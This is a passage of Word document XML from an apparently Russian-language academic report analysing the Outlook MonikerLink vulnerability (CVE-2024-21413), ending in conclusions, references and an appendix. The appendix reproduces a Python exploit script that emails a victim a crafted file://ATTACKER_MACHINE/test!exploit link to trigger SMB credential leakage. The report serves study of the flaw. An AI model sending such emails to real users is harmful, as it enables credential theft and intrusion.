      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>szUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — строковое представление объекта, подлежащего разрешению в COM Moniker. Анализ содержимого параметра показал, что в функцию передается путь к удаленному ресурсу без префикса file:///, что подтверждает передачу строки в механизм обработки Moniker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920DB7A" w14:textId="77777777" w:rsidR="00EE3A0F" w:rsidRDefault="00EE3A0F" w:rsidP="00EE3A0F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65676B" w14:textId="4F04A059" w:rsidR="00B652C7" w:rsidRDefault="00B652C7" w:rsidP="00B652C7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52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85BDB" wp14:editId="38EF881D">
            <wp:extent cx="6122670" cy="43053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1708" w14:textId="71CE6831" w:rsidR="00B652C7" w:rsidRDefault="00B652C7" w:rsidP="00B652C7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465D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szUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="702DECB6" w14:textId="77777777" w:rsidR="002D34CB" w:rsidRDefault="002D34CB" w:rsidP="00B652C7">
      <w:pPr>
        <w:pStyle w:val="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983093" w14:textId="77777777" w:rsidR="00EE3A0F" w:rsidRDefault="00EE3A0F" w:rsidP="00B652C7">
      <w:pPr>
        <w:pStyle w:val="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8524BE" w14:textId="77777777" w:rsidR="00EE3A0F" w:rsidRPr="002D34CB" w:rsidRDefault="00EE3A0F" w:rsidP="00B652C7">
      <w:pPr>
        <w:pStyle w:val="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CA18CB" w14:textId="3D16DDF4" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="00EE3A0F">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E17895" w14:textId="6DEB387A" w:rsidR="0055128B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65D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Проведенное исследование показало, что при обработке специально сформированной гиперссылки Outlook передает ее стандартному механизму обработки гиперссылок Windows. В результате строка интерпретируется функцией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025465D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MkParseDisplayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025465D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> как COM Moniker, что приводит к обращению к удаленному SMB-ресурсу и позволяет обойти механизм </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025465D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25465D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> View. Полученные результаты подтверждают, что причиной уязвимости является особенность взаимодействия Outlook с компонентами COM при обработке Moniker-ссылок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60F78A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2CC710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DD0F39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52565A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2267EE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54B58E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85D391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942166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F5FC2A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4D4248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EB41FD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1C1F6D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A6A704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AEC143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1A05EF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268655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67A344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253DFE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8BA381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BB74B6" w14:textId="77777777" w:rsid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AA9F4E" w14:textId="77777777" w:rsidR="0025465D" w:rsidRPr="0025465D" w:rsidRDefault="0025465D" w:rsidP="0025465D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DBB329" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="00EE3A0F">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Список использованных источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCB741" w14:textId="1DC7E90C" w:rsidR="0055128B" w:rsidRDefault="007376E2" w:rsidP="005436B3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ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big Picture [</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="000C67BA" w:rsidRPr="004C0AFB">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DD1A3B7" w14:textId="2A2000EB" w:rsidR="000C67BA" w:rsidRPr="005436B3" w:rsidRDefault="005436B3" w:rsidP="005436B3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contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-2024-21413 </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GITHUB</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CMNATIC</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>github</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CMNatic</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-2024-21413</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06C5F8DB" w14:textId="16CE616A" w:rsidR="00BA3672" w:rsidRPr="005436B3" w:rsidRDefault="005436B3" w:rsidP="005436B3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contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Understanding the Microsoft Outlook Vulnerability: CVE-2024–21413 (Moniker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Link)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3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hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://medium.com/@sithuminzin969/understanding-the-microsoft-outlook-vulnerability-cve-2024-21413-moniker-link-53885e5f77bf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C8CE313" w14:textId="3615016E" w:rsidR="00BA3672" w:rsidRPr="005436B3" w:rsidRDefault="005436B3" w:rsidP="005436B3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Moniker</w:t>
      </w:r>
      <w:r w:rsidRPr="00543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Link</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2024-21413) [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005436B3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>tryhackme</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>room</w:t>
        </w:r>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005436B3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>monikerlink</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CF48CED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70B5AE7C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14371120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40F4FD43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796BDA5F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1B448C44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52EB798B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3091C9B7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2EE8EFBA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231EC509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4AB99927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115099A0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28B56761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3DEC0C71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38B10730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5AA0A2A7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34FE5D59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1E5C3293" w14:textId="77777777" w:rsidR="00BA3672" w:rsidRPr="005436B3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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AF76FC" w14:textId="77777777" w:rsidR="00BA3672" w:rsidRPr="005436B3" w:rsidRDefault="00BA3672" w:rsidP="005436B3">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:adjustRightInd/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCA19D0" w14:textId="5908E0C6" w:rsidR="00BA3672" w:rsidRPr="00BA3672" w:rsidRDefault="00BA3672" w:rsidP="00BA3672">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5EDF51" w14:textId="7ED295CF" w:rsidR="00BA3672" w:rsidRPr="00BA3672" w:rsidRDefault="00BA3672" w:rsidP="00EE33F0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:adjustRightInd/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Листинг 1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67073BBE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6E22E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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BD160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6E22E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 xml:space="preserve">Author: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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CMNatic</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> | https://github.com/cmnatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC122F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6E22E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Version: 1.0 | 19/02/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44828BC3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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3886E3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</w:p>
    <w:p w14:paraId="169BA482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import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smtplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C02D43C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from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email.mime</w:t>
      </w:r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.text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import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MIMEText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4394E6CD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from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email.mime</w:t>
      </w:r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.multipart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import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MIMEMultipart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42671A9E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from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email.utils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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import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formataddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0874F891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</w:p>
    <w:p w14:paraId="0A708C00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sender_email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= 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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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attacker@monikerlink.thm</w:t>
      </w:r>
      <w:proofErr w:type="spell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r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="8292A2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Replace with your sender email address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB78DC1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receiver_email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= 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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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victim@monikerlink.thm</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="8292A2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Replace with the recipient email address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5EFF8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password = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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input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proofErr w:type="gram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"Enter your attacker email password: "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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93C22D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6E22E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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html_content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= 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"""\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D2451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6E22E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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB72DD0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6E22E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&lt;html lang="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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en</w:t>
      </w:r>
      <w:proofErr w:type="spell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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64655E1A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6E22E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 xml:space="preserve">    &lt;p&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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href</w:t>
      </w:r>
      <w:proofErr w:type="spell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="file://ATTACKER_MACHINE/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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test!exploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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"&gt;Click me&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7E79C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6E22E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DD0F2F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6E22E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 xml:space="preserve">    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C4ACE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&lt;/html&gt;"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE744F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</w:p>
    <w:p w14:paraId="6FF0F2BB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message = </w:t>
      </w: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MIMEMultipart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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099CEFD7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message[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'Subject'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] = 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"CVE-2024-21413"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9C0FA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message[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"From"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] = </w:t>
      </w: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formataddr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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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CMNatic</w:t>
      </w:r>
      <w:proofErr w:type="spell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, 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sender_email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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D27A9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message[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"To"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] = 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receiver_email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13C76D5E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</w:p>
    <w:p w14:paraId="64BB62FF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8292A2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Convert the HTML string into bytes and attach it to the message object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D1C527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msgHtml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= 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MIMEText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html_content,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'html</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21852DF4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message.attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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msgHtml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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40B9BE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</w:p>
    <w:p w14:paraId="0722682C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server = </w:t>
      </w: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smtplib.SMTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'MAILSERVER'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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="AE81FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>25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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0311A9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server.ehlo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C96AA4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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D0525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   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server.</w:t>
      </w:r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login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proofErr w:type="spellStart"/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sender_email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, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B480B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except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Exception </w:t>
      </w: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as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err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28577B2E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   </w:t>
      </w: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print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(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D5B7E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   </w:t>
      </w:r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exit(</w:t>
      </w:r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-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="AE81FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644BCB0F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</w:p>
    <w:p w14:paraId="4AB9F9EE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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6067C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   </w:t>
      </w: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server.sendmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sender_email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, [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receiver_email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], </w:t>
      </w:r>
      <w:proofErr w:type="spell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message.as_string</w:t>
      </w:r>
      <w:proofErr w:type="spell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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123B9E1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   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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print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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A6E22E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\n Email delivered"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029EF017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except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Exception </w:t>
      </w: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as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error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D65DE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   </w:t>
      </w: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print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(error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9C260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66D9EF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2CDB8" w14:textId="77777777" w:rsidR="00BA3672" w:rsidRPr="00BA3672" w:rsidRDefault="00BA3672" w:rsidP="00BA3672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F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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server.quit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F0D81" w14:textId="77777777" w:rsidR="0055128B" w:rsidRPr="000C67BA" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="150"/>
        <w:ind w:right="403"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A93BE5" w14:textId="77777777" w:rsidR="000E0C78" w:rsidRPr="005436B3" w:rsidRDefault="000E0C78" w:rsidP="005436B3">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:pageBreakBefore/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000E0C78" w:rsidRPr="005436B3" w:rsidSect="000E0C78">
      <w:headerReference w:type="default" r:id="rId36"/>
      <w:pgSz w:w="11910" w:h="16850"/>
